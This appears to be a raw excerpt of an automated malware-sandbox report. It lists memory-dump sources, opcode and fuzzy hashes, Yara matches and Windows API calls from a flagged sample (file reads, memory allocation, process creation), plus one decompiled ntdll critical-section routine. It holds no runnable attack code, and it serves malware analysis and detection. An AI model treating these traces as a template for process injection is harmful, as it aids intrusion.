                                          • Opcode Fuzzy Hash: c66af03d3637263344430743a4cb8dd68ddbad3737292d2628104d226fee807a
                                          • Instruction Fuzzy Hash: BE90027160110852D10061994404B464095A7E0345FD1C016A0154694DCA55C85575A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 53141e327a8666650e8f507819a634d6735bee061b58e7130121e30bc5e29187
                                          • Instruction ID: a9c3f7d0f97a06cdac8cd60c1ec48c19a43e7716ba191dfec65c7c3a5228bb8f
                                          • Opcode Fuzzy Hash: 53141e327a8666650e8f507819a634d6735bee061b58e7130121e30bc5e29187
                                          • Instruction Fuzzy Hash: CF900271A0510812D150719944147464095A7D0345FD1C011A0054694DCB958A5976E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5c60f8b964236352aba50c80db090cf397c38c566b6cf803cbccfd8f8af9845c
                                          • Instruction ID: 7bc2cc61bedb36f800b86491d05c54fb64addf8a929a7ce0223374a4207dc16d
                                          • Opcode Fuzzy Hash: 5c60f8b964236352aba50c80db090cf397c38c566b6cf803cbccfd8f8af9845c
                                          • Instruction Fuzzy Hash: 1090027160514852D14071994404A4640A5A7D0349FD1C011A00946D4DDA658D59B6E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction ID: 248e4f6fd279acaa2b30fa134827fa54eff3404e7b1356b4bf0cb7e47b51e214
                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 53%
                                          			E019EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                          				void* _t7;
                                          				intOrPtr _t9;
                                          				intOrPtr _t10;
                                          				intOrPtr* _t12;
                                          				intOrPtr* _t13;
                                          				intOrPtr _t14;
                                          				intOrPtr* _t15;
                                          
                                          				_t13 = __edx;
                                          				_push(_a4);
                                          				_t14 =  *[fs:0x18];
                                          				_t15 = _t12;
                                          				_t7 = E0199CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                          				_push(_t13);
                                          				E019E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                          				_t9 =  *_t15;
                                          				if(_t9 == 0xffffffff) {
                                          					_t10 = 0;
                                          				} else {
                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                          				}
                                          				_push(_t10);
                                          				_push(_t15);
                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                          				return E019E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                          			}










                                          0x019efdda
                                          0x019efde2
                                          0x019efde5
                                          0x019efdec
                                          0x019efdfa
                                          0x019efdff
                                          0x019efe0a
                                          0x019efe0f
                                          0x019efe17
                                          0x019efe1e
                                          0x019efe19
                                          0x019efe19
                                          0x019efe19
                                          0x019efe20
                                          0x019efe21
                                          0x019efe22
                                          0x019efe25
                                          0x019efe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 019EFDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 019EFE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 019EFE01
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 678c8bc4b171268a57cb556802ac9d1ade0d112b91bc673ae543e6f3cefa90e7
                                          • Instruction ID: d2359b1ae136f20abd9eb52cb4a53866f7b6d6fc8e37a91e1dc169d5d610d9f6
                                          • Opcode Fuzzy Hash: 678c8bc4b171268a57cb556802ac9d1ade0d112b91bc673ae543e6f3cefa90e7
                                          • Instruction Fuzzy Hash: 85F0C276640201BBEA211A86DC06E23BB9AEB84B30F150219F62C561D1DA62B83086A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,00AA4B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AA4B77,007A002E,00000000,00000060,00000000,00000000), ref: 00AA9D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: .z`
                                          • API String ID: 823142352-1441809116
                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction ID: a3648292e0d7724b4d6c422ea51fd4794534bf987fbaf4ab0ee8f03007bdc815
                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                          • Instruction Fuzzy Hash: 78F0BDB2200208AFCB48CF88DC95EEB77EDAF8C754F158248BA1D97241C630E811CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00AA4D32,5EB6522D,FFFFFFFF,00AA49F1,?,?,00AA4D32,?,00AA49F1,FFFFFFFF,5EB6522D,00AA4D32,?,00000000), ref: 00AA9E45
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: e6364cb0e70cabb3b3001f61a471ee8094def7c69c8c1dba0951814a8dee57c6
                                          • Instruction ID: 5dfb8184b76162eba0063296a2ad83ec7e7e910479ed445ce1931f130178afa2
                                          • Opcode Fuzzy Hash: e6364cb0e70cabb3b3001f61a471ee8094def7c69c8c1dba0951814a8dee57c6
                                          • Instruction Fuzzy Hash: CF21B6B6200109AFCB18DF99DC95EEB77EDEF8C754F158249BA1DA7241C630E911CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00AA4D10,?,?,00AA4D10,00000000,FFFFFFFF), ref: 00AA9EA5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 32c3951f864392ca5114e654e3262048c960c9fe6074f40cf1fcdcf122cd34c2
                                          • Instruction ID: d3fae2ca5046293c793fe7e9b68e11091e18570c53b32837f5b59a73b0f3fbc2
                                          • Opcode Fuzzy Hash: 32c3951f864392ca5114e654e3262048c960c9fe6074f40cf1fcdcf122cd34c2
                                          • Instruction Fuzzy Hash: 89F03CB5200209ABCB10EF99DC85DEB77ADEF88360F118549FE5C97281D630E9108BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(00AA4D32,5EB6522D,FFFFFFFF,00AA49F1,?,?,00AA4D32,?,00AA49F1,FFFFFFFF,5EB6522D,00AA4D32,?,00000000), ref: 00AA9E45
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction ID: 4cd39a4b0e94291207f9c2104a97bb1679ff3d5307d57bc18fe399534e84098f
                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                          • Instruction Fuzzy Hash: 2EF0A4B2200209AFCB14DF89DC91EEB77ADAF8C754F158248BA1D97241D630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA9F69
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: d52ec6a8dfa39541d7cc6db94caab15be569d48f0a0f5489b0cb3b5254de2b24
                                          • Instruction ID: 8a740e2fab977a08e160fb0999ff18cdc5b071174b2807ebef7c08c58faa2e7f
                                          • Opcode Fuzzy Hash: d52ec6a8dfa39541d7cc6db94caab15be569d48f0a0f5489b0cb3b5254de2b24
                                          • Instruction Fuzzy Hash: 0DF058B2200108AFCB24DF98CC81EEB77A8EF88340F118108FE49A7241C630E810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00A92D11,00002000,00003000,00000004), ref: 00AA9F69
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction ID: 5c26c47b97fd4840adac9b3361c5d588747d24cc4c2f2f6fd3ac2abcec3e13bf
                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                          • Instruction Fuzzy Hash: 1EF015B2200209AFCB14DF89CC81EAB77ADAF88750F118148BE1897241C630F810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(00AA4D10,?,?,00AA4D10,00000000,FFFFFFFF), ref: 00AA9EA5
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction ID: 377b263d149fcb5f969f8993b07e000b1dd8da8413ac2843275e33b3405a4a72
                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                          • Instruction Fuzzy Hash: ACD01776200214ABD710EB98CC86EA77BACEF48760F154499BA5C9B282C630FA0086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d2f410f66782ab7e05e7895c225ebde55419da0a54f1e0db6c9efc10757892dc
                                          • Instruction ID: ccc7ef90dd7dd568795d9400bb995eddb93714aeea04cf51fbe85c9f269e6dfc
                                          • Opcode Fuzzy Hash: d2f410f66782ab7e05e7895c225ebde55419da0a54f1e0db6c9efc10757892dc
                                          • Instruction Fuzzy Hash: CA9002A220200003610671594414716801ED7E4245B51C165E5005591DC565D8E17165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e9eaa8c076e03ed8a4f3457f5de38728e28c51ecf1113fc86eba1c4361ffad57
                                          • Instruction ID: a8320730c8bc27f847a864fc315bb9ceee834c266f90353be2e48049af7517fc
                                          • Opcode Fuzzy Hash: e9eaa8c076e03ed8a4f3457f5de38728e28c51ecf1113fc86eba1c4361ffad57
                                          • Instruction Fuzzy Hash: 07900266211000032106A5590704607405AD7D9395351C165F5006551CD661D8B16161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 500e99c3e93e55316d1bcad54fad495a248088f3b88375b2c005c02cfcb9bf5b
                                          • Instruction ID: 8aa155f75ba1166c7fe00a49128743651347e559df5263df59cab10b7802bc51
                                          • Opcode Fuzzy Hash: 500e99c3e93e55316d1bcad54fad495a248088f3b88375b2c005c02cfcb9bf5b
                                          • Instruction Fuzzy Hash: EA90027220108803F1116159840474A4019D7D4345F55C555A8415659D86D5D8E17161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 97b7af890fa8401b68b2b78d014bee24e584018ad2f547aab60952e5fe39113e
                                          • Instruction ID: 75a1a9d1ca066c6cd14cda5dad0492678452f82c477ce543b95d91abb89f27f2
                                          • Opcode Fuzzy Hash: 97b7af890fa8401b68b2b78d014bee24e584018ad2f547aab60952e5fe39113e
                                          • Instruction Fuzzy Hash: FE90027220100843F10161594404B464019D7E4345F51C15AA4115655D8655D8A17561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 45bc38401cfe28cf625f3c3acb9c3dbfe6ce003268bab7a671c8fb2c528ce815
                                          • Instruction ID: 21f9672804c2b6c24cd3834a7139ea7004dcc820f35c1d02d92708d7e3528bb3
                                          • Opcode Fuzzy Hash: 45bc38401cfe28cf625f3c3acb9c3dbfe6ce003268bab7a671c8fb2c528ce815
                                          • Instruction Fuzzy Hash: 1D90027220100803F1817159440474A4019D7D5345F91C159A4016655DCA55DAA977E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ed64d52f1fff4c54b290fcb676b1ef2dc1182da97debddfcf7dbb5321c4b41b3
                                          • Instruction ID: a862ae578d86e0b63ff3ca0e1bbf7658097f4e47e8861f62352269a642f3c469
                                          • Opcode Fuzzy Hash: ed64d52f1fff4c54b290fcb676b1ef2dc1182da97debddfcf7dbb5321c4b41b3
                                          • Instruction Fuzzy Hash: F090027220504843F14171594404B464029D7D4349F51C155A4055695D9665DDA5B6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: da5b0ea1e05753de9a2df08b408f1bc9ba50b740a1aa70a8bde5c54d92a3e08f
                                          • Instruction ID: 55610300171b01a0e253918836afefab8d38fdb024c458d360b2250da3a0c5ad
                                          • Opcode Fuzzy Hash: da5b0ea1e05753de9a2df08b408f1bc9ba50b740a1aa70a8bde5c54d92a3e08f
                                          • Instruction Fuzzy Hash: D290026A21300003F1817159540870A4019D7D5246F91D559A4006559CC955D8B96361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 002d7a876e0e1f0c63dcd643d2a96203360b43e95300e7f25c1fb63d00827848
                                          • Instruction ID: 738db46701496af5d8cfddd2c611a1f7037aa334b4ea44317a2a2fe424c2fe0e
                                          • Opcode Fuzzy Hash: 002d7a876e0e1f0c63dcd643d2a96203360b43e95300e7f25c1fb63d00827848
                                          • Instruction Fuzzy Hash: 0990027231114403F111615984047064019D7D5245F51C555A4815559D86D5D8E17162
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 52693cb57312e0077ecbf2797bb58f6c9a6883148157ad5da3ce019b2565749c
                                          • Instruction ID: 1b6b8d7d6a7e643719fcc83886d65ec00c31d111d0e011b58d855673595063f5
                                          • Opcode Fuzzy Hash: 52693cb57312e0077ecbf2797bb58f6c9a6883148157ad5da3ce019b2565749c
                                          • Instruction Fuzzy Hash: FC90027220100403F101659954087464019D7E4345F51D155A9015556EC6A5D8E17171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a1515e182aa16c1d982a44937fa00fac9c45020d734617c274f34ec754487d7a
                                          • Instruction ID: 278ec6072931e7d1eb8c342516b7c0f53dca17f6677dde2a9b1d68359fffb8d1
                                          • Opcode Fuzzy Hash: a1515e182aa16c1d982a44937fa00fac9c45020d734617c274f34ec754487d7a
                                          • Instruction Fuzzy Hash: A890027220100413F11261594504707401DD7D4285F91C556A4415559D9696D9A2B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 53366b76a033f991e0820c6b4959926d658d98fa925667aedcb482fff0ec0c96
                                          • Instruction ID: f379df77ca036d77783035de29d674bf9264be26fab3b1dd3a6f6b89405046de
                                          • Opcode Fuzzy Hash: 53366b76a033f991e0820c6b4959926d658d98fa925667aedcb482fff0ec0c96
                                          • Instruction Fuzzy Hash: 56900262242041537546B1594404607801AE7E4285791C156A5405951C8566E8A6E661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 07bb6acc4a8c8c6716e7ea80ff76de712021a59accb3d7544529ddcdabcf0ca0
                                          • Instruction ID: 06e33f9201ed1e13413d0202bc0a38d7655d9d0b6caf3eb16cd13e3e9031b9f8
                                          • Opcode Fuzzy Hash: 07bb6acc4a8c8c6716e7ea80ff76de712021a59accb3d7544529ddcdabcf0ca0
                                          • Instruction Fuzzy Hash: A49002A234100443F10161594414B064019D7E5345F51C159E5055555D8659DCA27166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: e1fa1f25d77469adca774e1d9d4c5ae80c431116b87be21a50b28c9fec8704a4
                                          • Instruction ID: 8c6a85ccbf5e9f7e9fa6ed0e7a72fc9f6ad4329f5a986e90de1bf82ec13d7f27
                                          • Opcode Fuzzy Hash: e1fa1f25d77469adca774e1d9d4c5ae80c431116b87be21a50b28c9fec8704a4
                                          • Instruction Fuzzy Hash: 9F9002B220100403F141715944047464019D7D4345F51C155A9055555E8699DDE576A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.912852622.0000000004AE0000.00000040.00000001.sdmp, Offset: 04AE0000, based on PE: true
                                          • Associated: 0000000C.00000002.912976785.0000000004BFB000.00000040.00000001.sdmp Download File
                                          • Associated: 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7149b8be3f178b22c49dd1cfbf0e681cb3f1e56f00f89fb185e1015697c9e054
                                          • Instruction ID: e40662176c39b9d371987d016025927492e60ce3bdb3455c34fd91997623c76a
                                          • Opcode Fuzzy Hash: 7149b8be3f178b22c49dd1cfbf0e681cb3f1e56f00f89fb185e1015697c9e054
                                          • Instruction Fuzzy Hash: E090026221180043F20165694C14B074019D7D4347F51C259A4145555CC955D8B16561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A93AF8), ref: 00AAA08D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: 5602ae2ce595cd190a0303e93c356108a865df1c21e1b00511f2d242b98c70c6
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 06E012B1200209ABDB18EF99CC49EA777ACAF88750F018558BA185B282C630E914CAB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A9834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A9836B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: e53b5b7ad0572521aa800ad7759a1ee729e3513d237bfdeb657aa77b8d8f0d4b
                                          • Instruction ID: 4358fba4bf785c4748335a30485f5f0f7892f1bd5518cd5ffed4da0c2e35027c
                                          • Opcode Fuzzy Hash: e53b5b7ad0572521aa800ad7759a1ee729e3513d237bfdeb657aa77b8d8f0d4b
                                          • Instruction Fuzzy Hash: D801B931A802187BEF20A6989D43FFE775C6B51B50F044559FE04FE1C1D699690542F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A9834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A9836B
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                          • Instruction ID: 63f77736494febd4f5fddacb542b63c205d20193db267e566241a5ef9b90ba0e
                                          • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                          • Instruction Fuzzy Hash: F1018431A802287AEB20A6989D03FBF766C6B51B50F044119FF04BE1C2E798690546F6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AAA124
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: b8503a2d71a2b669bb7460c07c055c94a0c7e3be4a5f022fec810fd7633f45b3
                                          • Instruction ID: 5380043d946ede3f67540608e641e904bc30460d4965ba7ef76ab727d6a9c0fb
                                          • Opcode Fuzzy Hash: b8503a2d71a2b669bb7460c07c055c94a0c7e3be4a5f022fec810fd7633f45b3
                                          • Instruction Fuzzy Hash: 05019DB2210108AFCB58CF99DC81EEB77ADAF8C354F158258FA0DA7251C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00AAA124
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
